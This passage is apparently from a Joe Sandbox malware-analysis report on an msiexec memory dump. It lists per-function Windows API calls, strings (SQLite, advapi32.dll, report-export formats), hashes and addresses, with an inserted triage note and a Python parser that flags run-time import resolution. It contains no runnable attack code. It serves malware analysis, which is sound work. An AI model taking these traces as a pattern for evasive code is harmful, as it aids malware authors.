• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$memset
• String ID: gj
• API String ID: 438689982-4203073231
• Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
• Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
• Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
• Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
APIs
• memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy
• String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
• API String ID: 3510742995-2446657581
• Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
• Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
• Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
• Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00405A25
• SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
• SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
• SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
• memset.MSVCRT ref: 00405ABB
• SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
• SetFocus.USER32(?), ref: 00405B76
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: MessageSend$FocusItemmemset
• String ID:
• API String ID: 4281309102-0
• Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
• Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
• Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
• Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: _snwprintfwcscat
                                                                                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                        • API String ID: 384018552-4153097237
                                                                                                        • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                        • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                        • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                        • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                        • String ID: 0$6
                                                                                                        • API String ID: 2029023288-3849865405
                                                                                                        • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                        • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                        • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                        • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                        APIs
                                                                                                          • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                        • memset.MSVCRT ref: 00405455
                                                                                                        • memset.MSVCRT ref: 0040546C
                                                                                                        • memset.MSVCRT ref: 00405483
                                                                                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$memcpy$ErrorLast
                                                                                                        • String ID: 6$\
                                                                                                        • API String ID: 404372293-1284684873
                                                                                                        • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                        • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                        • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                        • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesErrorFileLastSleep$free
                                                                                                        • String ID:
                                                                                                        • API String ID: 1470729244-0
                                                                                                        • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                        • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                        • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                        • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                        APIs
                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                        • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                        • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                        • wcscat.MSVCRT ref: 0040A0E6
                                                                                                        • wcscat.MSVCRT ref: 0040A0F5
                                                                                                        • wcscpy.MSVCRT ref: 0040A107
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 1331804452-0
                                                                                                        • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                        • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                        • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                        • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                        • String ID: advapi32.dll
                                                                                                        • API String ID: 2012295524-4050573280
                                                                                                        • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                        • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                        • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                        • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
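The record above chains GetSystemDirectoryW, wcscpy/wcscat and LoadLibraryW in a subcall with five GetProcAddress calls and references the string constant advapi32.dll: the function resolves its imports at run time instead of through the import table, so they do not show up in a static import scan. As an added example of triaging such listings (illustration code, not Joe Sandbox's code and not code from the sample), the following is a small parser for the record format used on this page that extracts each record's API calls, strings and ID fields and flags records that pair a LoadLibrary* call with GetProcAddress. The record layout is inferred from the listing itself; anything about field semantics beyond what the text shows is an assumption, and the embedded sample input is constructed from lines of the listing above.

```python
"""Parse Joe Sandbox function-listing records ('APIs / Strings / Memory Dump
Source / Similarity' blocks) and flag run-time import resolution.
Added example; record layout inferred from the listing, not from Joe Sandbox docs."""
import re
from dataclasses import dataclass, field
from typing import Optional

# API line: optional 'Part of subcall function XXXXXXXX: ', Name.MODULE, optional (args), ref: ADDR
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")
STR_RE = re.compile(r"^\s*•\s*(?P<text>.*?), xrefs: (?P<ref>[0-9A-F]{8})\s*$")
SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str                       # call-site address in the dump
    subcall: Optional[str] = None  # callee address when listed as 'Part of subcall function'

@dataclass
class FuncRecord:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # (text, xref address)
    fields: dict = field(default_factory=dict)   # 'API ID', 'String ID', 'Source File', ...

def parse_listing(text: str) -> list:
    """Split listing text into FuncRecords; every record opens with an 'APIs' header."""
    records, cur, section = [], None, None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            cur, section = FuncRecord(), "APIs"
            records.append(cur)
        elif cur is None:
            continue
        elif stripped in SECTIONS:
            section = stripped
        elif section == "APIs" and (m := API_RE.match(line)):
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
        elif section == "Strings" and (m := STR_RE.match(line)):
            cur.strings.append((m["text"], m["ref"]))
        elif (m := FIELD_RE.match(line)):
            cur.fields[m["key"]] = m["val"]
    return records

def resolves_apis_dynamically(rec: FuncRecord) -> bool:
    """True when the record (including its subcalls) loads a library and then looks up exports."""
    names = {c.name for c in rec.calls}
    return bool(names & LOADERS) and "GetProcAddress" in names

def referenced_libraries(rec: FuncRecord) -> list:
    """DLL names among the record's string constants (the '$'-separated 'String ID' field)."""
    return [s for s in rec.fields.get("String ID", "").split("$")
            if s.lower().endswith(".dll")]

def summarize(text: str) -> list:
    return [{
        "snapshot": rec.fields.get("Snapshot File"),
        "calls": [f"{c.name}.{c.module}" for c in rec.calls],
        "dynamic_resolution": resolves_apis_dynamically(rec),
        "libraries": referenced_libraries(rec),
        "getprocaddress_count": sum(c.name == "GetProcAddress" for c in rec.calls),
    } for rec in parse_listing(text)]

# Constructed sample: two records assembled from lines of the listing (indentation trimmed).
SAMPLE = """\
APIs
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
• GetProcAddress.KERNEL32(?,00000000), ref: 00404398
• GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
• GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: advapi32.dll
APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
• wcscpy.MSVCRT ref: 0040A0D9
Strings
• <%s>, xrefs: 004100A6
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: Time$Formatwcscatwcscpy$DateFileSystem
• String ID:
"""
```

The flag is a triage hint, not a verdict: legitimate software also resolves imports this way for optional features, so the string constants (here advapi32.dll) and the call-site addresses are what to take into the disassembler to confirm which exports the function actually looks up.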
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                        • <%s>, xrefs: 004100A6
                                                                                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$_snwprintf
                                                                                                        • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                        • API String ID: 3473751417-2880344631
                                                                                                        • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                        • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                        • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                        • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: wcscat$_snwprintfmemset
                                                                                                        • String ID: %2.2X
                                                                                                        • API String ID: 2521778956-791839006
                                                                                                        • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                        • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                        • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                        • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintfwcscpy
                                                                                                        • String ID: dialog_%d$general$menu_%d$strings
                                                                                                        • API String ID: 999028693-502967061
                                                                                                        • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                        • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                        • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                        • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                        APIs
                                                                                                        • strlen.MSVCRT ref: 00408DFA
                                                                                                          • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                        • memset.MSVCRT ref: 00408E46
                                                                                                        • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                        • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                        • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                        • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                        • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memsetstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2350177629-0
                                                                                                        • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                        • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                        • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                        • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset
                                                                                                        • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
• API String ID: 2221118986-1606337402
• Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
• Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
• Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
• Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
APIs
• _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
• memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
• memset.MSVCRT ref: 00408FD4
• memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
• memset.MSVCRT ref: 00409042
• memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
  • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memcmpmemset$_mbscpymemcpystrlen
• String ID:
• API String ID: 265355444-0
• Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
• Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
• Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
• Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
APIs
• memset.MSVCRT ref: 004116FF
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
• String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
• API String ID: 2618321458-3614832568
• Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
• Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
• Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
• Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
APIs
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: AttributesFilefreememset
• String ID:
• API String ID: 2507021081-0
• Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
• Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
• Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
• Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
APIs
• AreFileApisANSI.KERNEL32 ref: 004174FC
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
• malloc.MSVCRT ref: 00417524
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
• free.MSVCRT ref: 00417544
• free.MSVCRT ref: 00417562
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: ByteCharMultiWidefree$ApisFilemalloc
• String ID:
• API String ID: 4131324427-0
• Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
• Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
• Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
• Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
APIs
• GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
• GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
• free.MSVCRT ref: 0041822B
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: PathTemp$free
• String ID: %s\etilqs_$etilqs_
• API String ID: 924794160-1420421710
• Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
• Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
• Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
• Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
APIs
• memset.MSVCRT ref: 0040FDD5
  • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,<,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
• _snwprintf.MSVCRT ref: 0040FE1F
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
• String ID: <%s>%s</%s>$</item>$<item>
• API String ID: 1775345501-2769808009
• Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
• Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
• Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
• Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: ErrorLastMessage_snwprintf
• String ID: Error$Error %d: %s
• API String ID: 313946961-1552265934
